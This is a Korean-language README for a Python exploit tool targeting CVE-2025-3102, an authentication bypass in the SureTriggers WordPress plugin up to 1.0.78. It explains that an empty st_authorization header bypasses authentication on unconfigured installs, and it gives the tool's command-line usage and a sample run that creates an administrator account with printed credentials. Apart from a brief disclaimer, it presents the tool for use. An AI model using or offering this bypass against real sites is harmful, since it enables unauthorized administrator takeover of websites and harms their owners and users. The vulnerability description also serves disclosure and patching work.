
Wordpress SureTriggers <= 1.0.78 - 빈 값 확인 누락으로 인한 인증 우회로 인증되지 않은 관리자 사용자 생성
🚨 CVE-2025-3102는 SureTriggers: All-in-One Automation Platform WordPress 플러그인에 영향을 미치는 중요한 인증 우회 취약점입니다. 이 플러그인은 100,000개 이상의 웹사이트에 활발히 설치되어 있습니다. 결함의 특성과 배포 규모로 인해 이 취약점은 심각한 보안 위험을 초래합니다.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HWordPress용 SureTriggers 플러그인은 인증 우회에 취약하여 인증되지 않은 공격자가 관리자 계정을 생성할 수 있습니다. 이는 autheticate_user 함수 내의 secret_key에 대한 누락된 빈 값 확인 때문입니다.
플러그인이 설치 및 활성화되었지만 API 키로 구성되지 않은 경우, 공격자는 빈 st_authorization 헤더를 전송하여 인증을 우회하고 인증된 사용자에게 예약된 작업을 트리거할 수 있습니다.
이 취약점의 익스플로잇을 자동화하기 위해 Python 스크립트가 제공됩니다.
이 스크립트를 사용하면 취약한 사이트에서 새 관리자 사용자를 생성할 수 있습니다.
readme.txt를 통한 플러그인 버전 자동 감지st_authorization 헤더를 사용한 인증 우회usage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
이 스크립트는 교육 목적으로만 제공됩니다.
명시적 허가 없이 대상을 대상으로 이 코드를 무단 사용하는 것은 불법입니다.
저자는 오용이나 발생한 손해에 대해 책임을 지지 않습니다.
작성자: Nxploited ( Khaled Alenazi )